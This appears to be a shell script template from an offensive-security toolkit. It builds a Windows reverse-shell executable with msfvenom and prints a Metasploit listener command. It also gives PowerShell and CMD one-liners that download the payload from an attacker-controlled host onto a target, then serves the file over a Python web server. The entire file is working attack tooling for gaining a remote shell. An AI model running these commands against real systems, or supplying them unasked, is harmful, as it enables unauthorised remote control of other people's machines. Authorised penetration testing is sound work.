mkdir -p packstation/outbound; echo 'msfvenom creates the payload. Please wait...'; \
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<%=$(esh variables/attacker_ip)%> LPORT=<%=$(esh variables/shell_port)%> -f exe > packstation/outbound/revshell.exe ; \
echo '================================================================'; \
echo '                      ------Listener------                      '; \
echo 'Start listener: msfconsole -q -x "use exploit/multi/handler;set payload windows/x64/shell_reverse_tcp;set LHOST <%=$(esh variables/attacker_ip)%>;set LPORT <%=$(esh variables/shell_port)%>;run;"'; \
echo '================================================================'; \
echo '                      -----PowerShell-----                      '; \
echo 'Deliver only: iwr -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/revshell.exe -Outfile <%=$(esh variables/delivery_path_windows)%>\revshell.exe'; \
echo '================================================================'; \
echo '                         -----CMD-----                          '; \
echo 'Deliver only: powershell wget -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/revshell.exe -Outfile <%=$(esh variables/delivery_path_windows)%>\revshell.exe'; \
echo '================================================================'; \
python -m http.server <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
